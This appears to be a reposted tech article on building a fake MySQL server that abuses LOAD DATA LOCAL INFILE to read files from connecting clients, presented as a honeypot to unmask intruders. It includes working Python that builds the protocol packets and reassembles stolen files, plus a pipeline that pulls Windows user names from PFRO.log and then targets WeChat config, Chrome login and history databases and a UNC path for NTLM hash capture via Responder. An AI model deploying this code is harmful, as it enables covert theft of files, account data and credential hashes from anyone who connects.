2025-03-29 Update From: SLTechnology News&Howtos
Shulou (Shulou.com) 06/01 Report
This article explains how to obtain an attacker's WeChat ID with a MySQL honeypot. The editor thinks it is quite practical, so it is shared here for study; I hope you get something out of it. Without further ado, let's take a look.
Principle
The MySQL statement load data local infile '/etc/passwd' into table test fields terminated by '\n'; makes the client read a file from its own local disk and send the contents to the server, which inserts them into the table. The important detail is that the server, not the client, names the file: after the client issues the query, the server replies with a request carrying the file name, and the client obediently sends that file. So we can run a fake, malicious server that sends a file-read request to any client that connects to it. This technique is not new, but used sensibly it gives good results.
Utilization
Capture the traffic and look at the two key points of the exchange when a client connects to MySQL:
The server first returns its version, salt and other information (the greeting, or initial handshake packet):
After the client sends the account and password, the server returns a packet indicating that authentication succeeded (the OK packet):
At this point we only need to wait for the client to send one more packet (its first query), and then we can send the payload that reads the file. Take a look at the file-read packet:
Here 000001 is the packet sequence number, fb is the packet type (the LOCAL INFILE request), the last box is the file name to read, and the leading 14 is the packet length in hexadecimal, counted from fb, so it equals the file name length plus one. The payload is therefore chr(len(filename) + 1) + "\x00\x00\x01\xfb" + filename: a three-byte little-endian length (only the low byte is non-zero for file names shorter than 255 bytes), sequence number 1, the fb marker and the file name. The client answers with the file contents split across one or more packets, followed by an empty packet that marks the end of the file.
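The packet layout described above, as an added example that is not code from the original article: helpers that build the server-side packets of the exchange (greeting, OK packet, LOCAL INFILE request) and reassemble the file the client streams back. The server version string, salt, thread id and the file names used in comments are placeholders; the socket accept/read loop around these helpers is left to the operator.

```python
"""Packet helpers for a MySQL honeypot that abuses LOAD DATA LOCAL INFILE.

Added example, not code from the article. Constants follow the MySQL
client/server protocol; server version, salt and thread id are placeholders.
"""
import struct

CLIENT_LOCAL_FILES = 0x00000080       # server may ask the client for local files
CLIENT_PROTOCOL_41 = 0x00000200
CLIENT_SECURE_CONNECTION = 0x00008000
CLIENT_PLUGIN_AUTH = 0x00080000
COM_QUERY = 0x03
LOCAL_INFILE_MARKER = 0xFB


def packet(seq, payload):
    """Frame a payload: 3-byte little-endian length, then 1-byte sequence number."""
    if len(payload) > 0xFFFFFF:
        raise ValueError("payload too large for a single packet")
    return struct.pack("<I", len(payload))[:3] + bytes([seq & 0xFF]) + payload


def split_packets(data):
    """Yield (seq, payload) for every complete packet in a byte buffer."""
    pos = 0
    while pos + 4 <= len(data):
        length = int.from_bytes(data[pos:pos + 3], "little")
        seq = data[pos + 3]
        body = data[pos + 4:pos + 4 + length]
        if len(body) < length:
            break  # truncated packet: the caller must read more bytes first
        yield seq, body
        pos += 4 + length


def greeting(server_version=b"5.7.29", thread_id=1, salt=b"A" * 20):
    """Initial handshake (protocol v10) that advertises CLIENT_LOCAL_FILES."""
    caps = (CLIENT_LOCAL_FILES | CLIENT_PROTOCOL_41
            | CLIENT_SECURE_CONNECTION | CLIENT_PLUGIN_AUTH)
    body = (b"\x0a" + server_version + b"\x00"
            + struct.pack("<I", thread_id)
            + salt[:8] + b"\x00"                 # auth-plugin-data part 1, filler
            + struct.pack("<H", caps & 0xFFFF)   # capability flags, lower half
            + b"\x21"                            # charset utf8_general_ci
            + struct.pack("<H", 0x0002)          # SERVER_STATUS_AUTOCOMMIT
            + struct.pack("<H", caps >> 16)      # capability flags, upper half
            + bytes([len(salt) + 1])             # auth-plugin-data length
            + b"\x00" * 10                       # reserved
            + salt[8:] + b"\x00"                 # auth-plugin-data part 2
            + b"mysql_native_password\x00")
    return packet(0, body)


def ok_packet(seq):
    """OK packet: header 0x00, affected rows 0, last insert id 0, status, warnings."""
    return packet(seq, b"\x00\x00\x00" + struct.pack("<HH", 0x0002, 0))


def local_infile_request(filename, seq=1):
    r"""Ask the client to send a file: 0xFB followed by the file name.

    Byte-for-byte the article's chr(len(filename)+1) + "\x00\x00\x01\xfb" + filename
    for names shorter than 255 bytes, but with a correct 3-byte length field.
    """
    return packet(seq, bytes([LOCAL_INFILE_MARKER]) + filename.encode())


def query_text(payload):
    """Return the SQL text of a COM_QUERY payload, or None for any other command."""
    if payload and payload[0] == COM_QUERY:
        return payload[1:].decode("utf-8", "replace")
    return None


def receive_file(data):
    """Reassemble the file a client streams back after a LOCAL INFILE request.

    The client sends the contents in packets and terminates with an empty one.
    Returns (content_so_far, complete_flag).
    """
    chunks = []
    for _, body in split_packets(data):
        if body == b"":
            return b"".join(chunks), True
        chunks.append(body)
    return b"".join(chunks), False
```

In a honeypot loop the order is: send greeting(), read the client's login packet, send ok_packet(2), wait for the first command packet (query_text() tells you what was asked, which is also the place to match the scanner's queries discussed below), then send local_infile_request(...) and feed everything that arrives afterwards to receive_file() until it reports completion.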
Given arbitrary file read, what we want most is information that identifies the attacker. Almost everyone uses WeChat, and if the attacker does not keep the office environment separate from the one used for intrusion, there is a chance to obtain the attacker's WeChat ID.
On Windows, WeChat's default configuration directory is C:\Users\<username>\Documents\WeChat Files\. Searching inside it, the file C:\Users\<username>\Documents\WeChat Files\All Users\config\config.data turns out to contain the WeChat ID:
Fetching this file has one more precondition: knowing the attacker's Windows user name. User names usually show up in various log files, so we need files with fixed names that exist on most machines. Testing shows that on a computer that has been in use for a while, a user name can usually be found in C:\Windows\PFRO.log.
Camouflage
After getting into an intranet, attackers usually do host discovery and port scanning. If MySQL shows up in the scan, they will probably try to brute-force it. A honeypot that the scanner cannot flag as having a weak password is useless, so the scanner's traffic also has to be captured.
Take the Super Weak Password Check tool as an example. First set up a normal MySQL service locally and capture with Wireshark to see what requests the scanner sends:
As you can see, this tool sends five query packets after the password is verified. If the responses are wrong, it does not report a weak password. So we extract the server's response data from the capture and put it into the program; when those requests arrive, the corresponding packet is returned:
This allows the scanner to recognize it:
Effect
When an attacker finds the weak password, he will most likely connect and take a look. If he uses Navicat, the file can be read:
Write a simple web page that displays the attacker's WeChat ID, then scan it and add them.
Thoughts
Besides the WeChat ID, what else of value can we get?
Chrome's Login Data: although the passwords in it cannot be decrypted from the file alone, the account names it stores can still be obtained.
'C:/Users/' + username + '/AppData/Local/Google/Chrome/User Data/Default/Login Data'
Chrome's browsing history:
'C:/Users/' + username + '/AppData/Local/Google/Chrome/User Data/Default/History'
The user's NTLM hash (Bettercap + Responder): request a UNC path so that the client authenticates to our SMB listener:
\\ip\test
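The follow-up steps above, picking a user name out of PFRO.log and turning it into the list of files to request next (the WeChat config.data from the earlier section, the two Chrome databases and the UNC path), as an added example that is not code from the article. The PFRO.log lines are constructed to resemble the Windows pending-file-rename log; real entries on a given host will differ. The example assumes forward slashes are acceptable in the paths handed to a Windows MySQL client and that the listener address is supplied by the operator.

```python
"""Decide which client files to request next from what earlier reads returned.

Added example, not code from the article. SAMPLE_PFRO_LOG is constructed,
not real log data; the listener IP and user names are placeholders.
"""
import re

# Any path under <drive>:\Users\<name>\ reveals a profile name. Built-in
# profiles never belong to the person at the keyboard, so they are skipped.
USER_PATH_RE = re.compile(r"[A-Za-z]:\\Users\\([^\\\r\n]+)\\")
NOT_A_PERSON = {"Public", "Default", "Default User", "All Users"}

SAMPLE_PFRO_LOG = (  # constructed sample lines, not a real PFRO.log
    "4/6/2024 08:07:45 - PFRO Error: \\??\\C:\\Users\\alice\\AppData\\Local\\Temp\\tmp1.dll, 0xc0000034\n"
    "4/6/2024 08:07:45 - PFRO Error: \\??\\C:\\Users\\Public\\Desktop\\x.lnk, 0xc0000034\n"
    "4/7/2024 09:11:02 - PFRO Error: \\??\\C:\\Users\\alice\\Downloads\\a.tmp, 0xc0000034\n"
    "4/9/2024 17:40:13 - PFRO Error: \\??\\C:\\Users\\bob\\AppData\\Local\\Temp\\b.tmp, 0xc0000034\n"
)


def decode_log(raw):
    """The log may arrive as UTF-16 with a BOM or as plain 8-bit text; handle both."""
    if raw.startswith(b"\xff\xfe") or raw.startswith(b"\xfe\xff"):
        return raw.decode("utf-16")
    return raw.decode("utf-8", "replace")


def usernames_from_log(text):
    """Candidate Windows user names, most frequently mentioned first."""
    counts = {}
    for name in USER_PATH_RE.findall(text):
        if name not in NOT_A_PERSON:
            counts[name] = counts.get(name, 0) + 1
    return sorted(counts, key=lambda n: -counts[n])


def files_to_request(username, listener_ip):
    """Ordered file names to push in successive LOCAL INFILE requests.

    The last entry is not a file we expect to receive: asking the client to
    open a UNC path makes it authenticate to listener_ip over SMB, which is
    where Responder captures the NTLM hash.
    """
    profile = "C:/Users/" + username
    return [
        profile + "/Documents/WeChat Files/All Users/config/config.data",
        profile + "/AppData/Local/Google/Chrome/User Data/Default/Login Data",
        profile + "/AppData/Local/Google/Chrome/User Data/Default/History",
        "\\\\" + listener_ip + "\\test",
    ]


def plan(pfro_raw, listener_ip):
    """Whole pipeline: raw PFRO.log bytes in, list of follow-up file names out."""
    names = usernames_from_log(decode_log(pfro_raw))
    return [f for n in names for f in files_to_request(n, listener_ip)]
```

Each request is one LOCAL INFILE packet after the client's next query, so the list is consumed one entry per round trip; an empty list from plan() means PFRO.log gave no usable name and another log file should be tried first.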
That is how to obtain an attacker's WeChat ID with a MySQL honeypot. The editor believes it contains points that may come up in daily work, and hopes you have learned something from it.
© 2024 shulou.com SLNews company. All rights reserved.